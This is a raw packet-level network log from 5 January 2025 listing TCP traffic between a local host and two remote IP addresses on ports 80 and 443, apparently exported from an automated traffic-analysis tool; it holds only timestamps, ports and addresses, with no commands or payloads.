                                                                                                  Jan 5, 2025 08:59:21.815179110 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815181017 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815186977 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815191984 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815197945 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815200090 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815203905 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815220118 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815282106 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815310955 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815463066 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815474987 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815481901 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815490961 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815498114 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815516949 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815531969 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815706015 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815716028 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815726995 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815746069 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815771103 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815854073 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815865040 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815875053 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815885067 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815892935 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815895081 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815906048 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815911055 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815917015 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815927029 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815937042 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815938950 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815948009 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815958977 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815968037 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815968990 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815979004 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815993071 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816010952 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816391945 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816402912 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816414118 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816427946 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816451073 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816529989 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816540956 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816550016 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816570044 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816571951 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816582918 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816582918 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816593885 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816603899 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816612005 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816613913 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816625118 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816634893 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816637039 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816647053 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816658020 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816662073 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816669941 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.816695929 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.816720009 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.819715977 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819727898 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819739103 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819749117 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819760084 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819771051 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819801092 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.819838047 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.819859028 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819869041 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819875002 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819884062 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819889069 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819900036 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819910049 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.819931984 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.819937944 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819947958 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819957972 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819971085 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819974899 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.819982052 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819991112 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.819993973 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.820031881 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.820314884 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.820326090 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.820336103 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.820364952 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.820368052 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.820375919 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.820379019 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.820386887 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.820396900 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.820410013 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.820436954 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.831857920 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.831882954 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.831893921 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.831932068 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.831957102 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901415110 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901432991 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901534081 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901571035 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901582003 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901592970 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901602983 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901611090 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901613951 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901626110 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901654005 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901679039 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901706934 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901724100 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901735067 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901741982 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901743889 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901756048 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901761055 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901766062 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901777029 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901787996 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901791096 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901799917 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901808023 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901810884 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.901824951 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.901853085 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936264038 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936276913 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936357021 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936492920 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936510086 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936521053 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936531067 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936541080 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936542034 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936553001 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936568975 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936568975 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936579943 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936599970 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936605930 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936614990 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936618090 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936628103 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936639071 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936641932 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936655045 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936664104 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936674118 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936676979 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936686993 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936693907 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936697960 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936708927 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936718941 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936721087 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936736107 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936747074 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936754942 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936758041 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936769009 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936772108 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936789989 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936799049 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936800003 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936810017 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936825991 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936829090 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936837912 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936857939 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936873913 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936880112 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936885118 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936896086 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936917067 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936930895 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936940908 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936974049 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.936979055 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.936985970 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937010050 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937035084 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937046051 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937057018 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937074900 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937092066 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937110901 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937127113 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937136889 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937145948 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937158108 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937165976 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937169075 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937180042 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937186956 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937201977 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937227011 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937243938 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937277079 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937338114 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937367916 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937375069 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937378883 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937401056 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937414885 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937424898 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937436104 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937447071 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937457085 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937462091 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937469006 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937478065 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937503099 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937508106 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937513113 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937529087 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937539101 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937541008 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937552929 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937562943 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937570095 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937573910 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937596083 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937613010 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937623978 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937633991 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937638998 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937644958 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937655926 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937666893 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937710047 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937755108 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937766075 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937772036 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937777042 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937788963 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937793970 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937798977 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937809944 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937820911 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937850952 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937895060 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937915087 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937926054 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937937021 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937964916 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937966108 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.937974930 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937987089 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.937989950 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938040972 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938049078 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938064098 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938075066 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938085079 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938088894 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938097000 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938107967 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938134909 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938154936 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938169003 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938172102 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938179016 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938189983 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938195944 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938230991 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938359976 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938370943 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938380957 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938390970 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938400984 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938401937 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938412905 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938424110 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.938438892 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.938469887 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:23.050497055 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.050543070 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.050600052 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.052540064 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.052555084 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.522233009 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.522301912 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.527692080 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.527704000 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.527961969 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.578296900 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.692557096 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.692578077 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.692697048 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.982136011 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.982224941 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.982542992 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.983627081 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.983648062 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.983680964 CET49706443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.983686924 CET44349706104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.992505074 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.992549896 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.992670059 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.992933035 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:23.992944956 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.467369080 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.467441082 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.468713045 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.468725920 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.469000101 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.470375061 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.470535040 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.470566988 CET44349707104.21.112.1192.168.2.5
